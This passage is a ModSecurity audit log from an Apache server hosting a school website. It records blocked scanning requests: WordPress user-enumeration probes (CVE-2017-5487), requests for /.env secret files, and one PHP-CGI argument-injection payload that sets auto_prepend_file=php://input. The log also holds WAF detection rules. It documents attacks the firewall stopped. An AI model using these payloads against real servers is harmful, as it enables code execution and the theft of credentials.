(CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747994990429035 3587 (- - -) Stopwatch2: 1747994990429035 3587; combined=1913, p1=602, p2=1280, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb0d486c-Z-- --dffe181b-A-- [23/May/2025:17:15:45 +0700] aDBK0bz70bfNdlplZZMXxAAAAEs 103.236.140.4 35972 103.236.140.4 8181 --dffe181b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.74.157.16 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.74.157.16 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dffe181b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dffe181b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747995345789339 2780 (- - -) Stopwatch2: 1747995345789339 2780; combined=1388, p1=416, p2=948, p3=0, p4=0, p5=24, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dffe181b-Z-- --dfaaef15-A-- [23/May/2025:17:32:00 +0700] aDBOoLz70bfNdlplZZMnSwAAAEc 103.236.140.4 42898 103.236.140.4 8181 --dfaaef15-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 114.43.135.35 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 114.43.135.35 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --dfaaef15-C-- --dfaaef15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfaaef15-E-- --dfaaef15-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747996320619498 5572 (- - -) Stopwatch2: 1747996320619498 5572; combined=3906, p1=469, p2=3395, p3=0, p4=0, p5=42, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfaaef15-Z-- --c4ddd904-A-- [23/May/2025:17:52:17 +0700] aDBTYVYzwfxII7zMfyEvbAAAAAo 103.236.140.4 57678 103.236.140.4 8181 --c4ddd904-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.187.222.56 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.187.222.56 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c4ddd904-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4ddd904-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747997537162719 3268 (- - -) Stopwatch2: 1747997537162719 3268; combined=1718, p1=563, p2=1128, p3=0, p4=0, p5=26, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4ddd904-Z-- --1f3ad246-A-- [23/May/2025:18:09:31 +0700] aDBXa2_WNRyhaqaKDLzRDwAAAMw 103.236.140.4 37792 103.236.140.4 8181 --1f3ad246-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 59.98.147.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 59.98.147.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1f3ad246-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f3ad246-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747998571510710 3447 (- - -) Stopwatch2: 1747998571510710 3447; combined=1965, p1=641, p2=1292, p3=0, p4=0, p5=32, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f3ad246-Z-- --78dd897e-A-- [23/May/2025:18:37:14 +0700] aDBd6lYzwfxII7zMfyFU0AAAABI 103.236.140.4 40430 103.236.140.4 8181 --78dd897e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 Accept-Charset: utf-8 --78dd897e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --78dd897e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748000234685810 631 (- - -) Stopwatch2: 1748000234685810 631; combined=258, p1=225, p2=0, p3=0, p4=0, p5=33, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78dd897e-Z-- --0f06453a-A-- [23/May/2025:18:53:03 +0700] aDBhn7z70bfNdlplZZN6cAAAAFc 103.236.140.4 46660 103.236.140.4 8181 --0f06453a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3844.0 Safari/537.36 Accept-Charset: utf-8 --0f06453a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f06453a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748001183278726 1261 (- - -) Stopwatch2: 1748001183278726 1261; combined=387, p1=346, p2=0, p3=0, p4=0, p5=41, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f06453a-Z-- --88e4db3e-A-- [23/May/2025:18:59:28 +0700] aDBjILz70bfNdlplZZOB_AAAAFY 103.236.140.4 60548 103.236.140.4 8181 --88e4db3e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.118.97.137 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.118.97.137 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --88e4db3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88e4db3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748001568016653 2606 (- - -) Stopwatch2: 1748001568016653 2606; combined=1382, p1=410, p2=949, p3=0, p4=0, p5=23, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88e4db3e-Z-- --3327254a-A-- [23/May/2025:19:26:33 +0700] aDBpebz70bfNdlplZZObvQAAAEQ 103.236.140.4 34854 103.236.140.4 8181 --3327254a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.69.216.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.69.216.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3327254a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3327254a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748003193525980 2525 (- - -) Stopwatch2: 1748003193525980 2525; combined=1133, p1=365, p2=740, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3327254a-Z-- --6116dc34-A-- [23/May/2025:19:26:48 +0700] aDBpiLz70bfNdlplZZOb0AAAAEg 103.236.140.4 35392 103.236.140.4 8181 --6116dc34-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 92.205.212.128 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 92.205.212.128 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6116dc34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6116dc34-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748003208067791 2430 (- - -) Stopwatch2: 1748003208067791 2430; combined=1225, p1=379, p2=817, p3=0, p4=0, p5=28, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6116dc34-Z-- --44d95d02-A-- [23/May/2025:20:20:22 +0700] aDB2Fh67_KloOut96Ek_7QAAAIQ 103.236.140.4 38554 103.236.140.4 8181 --44d95d02-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 42.114.72.83 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 42.114.72.83 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --44d95d02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44d95d02-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748006422755308 902 (- - -) Stopwatch2: 1748006422755308 902; combined=386, p1=342, p2=0, p3=0, p4=0, p5=44, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44d95d02-Z-- --1b5fed3a-A-- [23/May/2025:20:29:43 +0700] aDB4R2_WNRyhaqaKDLxsoAAAAMA 103.236.140.4 58662 103.236.140.4 8181 --1b5fed3a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.133.6.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.133.6.13 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1b5fed3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b5fed3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748006983680039 1971 (- - -) Stopwatch2: 1748006983680039 1971; combined=1028, p1=344, p2=660, p3=0, p4=0, p5=23, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b5fed3a-Z-- --c7dd7953-A-- [23/May/2025:21:06:19 +0700] aDCA2x67_KloOut96El8gQAAAI4 103.236.140.4 58712 103.236.140.4 8181 --c7dd7953-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.184.176.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.184.176.179 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c7dd7953-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7dd7953-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748009179074903 3199 (- - -) Stopwatch2: 1748009179074903 3199; combined=1759, p1=536, p2=1193, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7dd7953-Z-- --d63e194d-A-- [23/May/2025:21:06:52 +0700] aDCA_G_WNRyhaqaKDLypHwAAANY 103.236.140.4 32904 103.236.140.4 8181 --d63e194d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.229.68.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.229.68.81 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d63e194d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d63e194d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748009212520301 3338 (- - -) Stopwatch2: 1748009212520301 3338; combined=1756, p1=539, p2=1187, p3=0, p4=0, p5=30, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d63e194d-Z-- --3c5af55a-A-- [23/May/2025:21:52:24 +0700] aDCLqG_WNRyhaqaKDLztfwAAAMU 103.236.140.4 39294 103.236.140.4 8181 --3c5af55a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 182.23.93.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.23.93.4 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3c5af55a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c5af55a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748011944044731 2982 (- - -) Stopwatch2: 1748011944044731 2982; combined=1375, p1=457, p2=883, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c5af55a-Z-- --7dca065f-A-- [23/May/2025:21:58:17 +0700] aDCNCR67_KloOut96EnJwAAAAIo 103.236.140.4 35810 103.236.140.4 8181 --7dca065f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 65.20.151.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 65.20.151.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7dca065f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7dca065f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748012297750205 3275 (- - -) Stopwatch2: 1748012297750205 3275; combined=1663, p1=507, p2=1127, p3=0, p4=0, p5=29, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7dca065f-Z-- --444d5a7d-A-- [23/May/2025:22:06:23 +0700] aDCO71YzwfxII7zMfyEoVQAAABQ 103.236.140.4 42514 103.236.140.4 8181 --444d5a7d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:54.0) Gecko/20100101 Firefox/54.0 Accept-Charset: utf-8 --444d5a7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --444d5a7d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748012783783989 733 (- - -) Stopwatch2: 1748012783783989 733; combined=304, p1=255, p2=0, p3=0, p4=0, p5=49, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --444d5a7d-Z-- --1dd5be7a-A-- [23/May/2025:23:08:09 +0700] aDCdaR67_KloOut96EkjJwAAAIM 103.236.140.4 59892 103.236.140.4 8181 --1dd5be7a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 92.205.19.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 92.205.19.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1dd5be7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1dd5be7a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748016489444454 2044 (- - -) Stopwatch2: 1748016489444454 2044; combined=1088, p1=352, p2=705, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0 